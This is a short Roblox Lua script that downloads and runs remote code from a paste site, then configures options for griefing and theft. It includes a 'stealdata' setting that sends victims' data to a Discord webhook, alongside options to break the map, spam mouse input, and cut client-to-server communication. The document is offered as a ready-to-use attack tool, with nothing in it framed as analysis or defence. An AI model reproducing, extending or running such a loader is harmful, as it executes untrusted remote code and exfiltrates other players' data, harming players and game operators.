local thescript = loadstring(game:HttpGet("https://pastefy.app/d3Wk8Yi1/raw"))() thescript.mouseshake = false -- mouse shake like move the mouse (not work on mobile) thescript.mouseshakeradins = 10 -- idk thescript.spammouse = false -- bro that evil thescript.stealdata = false -- steal data (beta) thescript.stealdatawebhookdc = "https://discord.com/api/webhooks/XXXXXXXXXXXXX/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" -- for steal data where to send thescript.breakthemap = false -- you know thescript.deletefunctionclienttoserver = false -- stop client to send to server (7+ only) thescript.deleterobloxgui = false -- Delete the Menu etc thescript.Load() -- Run the Script